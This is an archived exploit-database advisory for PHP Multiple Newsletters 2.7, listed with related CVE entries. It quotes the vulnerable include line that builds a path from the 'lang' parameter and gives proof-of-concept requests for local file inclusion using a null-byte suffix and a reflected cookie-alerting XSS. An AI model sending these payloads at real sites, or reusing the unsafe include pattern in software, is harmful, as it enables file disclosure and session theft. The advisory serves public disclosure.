Lucene search
AhmadbadyEDB-ID:7400HistoryDec 09, 2008 - 12:00 a.m.
PHP Multiple Newsletters 2.7 - Local File Inclusion / Cross-Site Scripting
2008-12-0900:00:00
ahmadbady
www.exploit-db.com
25
AI Score
7.4
Confidence
Low
****(Lfi/xss)****
script: PHP_Multiple_Newsletters v2.7
***************************************************************************
download from:http://www.phpmultiplenewsletters.com/modules/phpmultiplenewsletters.com/dist/free/PHP_Multiple_Newsletters_v2.7.zip
***************************************************************************
vul:/index.php
line 36:
include ('language/'..$_REQUEST['lang'].'.php');
***************************************************
xpl:
www.site.com/path/index.php?lang=[Lfi]%00
xss:
www.site.com/path/index.php/>"><ScRiPt>alert(document.cookie)</ScRiPt>
...................................................
Author: ahmadbady from:iran
my mail: [email protected]
***************************************************
# milw0rm.com [2008-12-09]Related
cvelist
cvelist
CVE-2008-5566
2008-12-15 17:45:00
CVE-2008-5570
2008-12-15 17:45:00
prion
prion
Cross site scripting
2008-12-15 18:00:00
Directory traversal
2008-12-15 18:00:00
cve
cve
CVE-2008-5566
2008-12-15 18:00:00
CVE-2008-5570
2008-12-15 18:00:00
nvd
nvd
CVE-2008-5570
2008-12-15 18:00:00
CVE-2008-5566
2008-12-15 18:00:00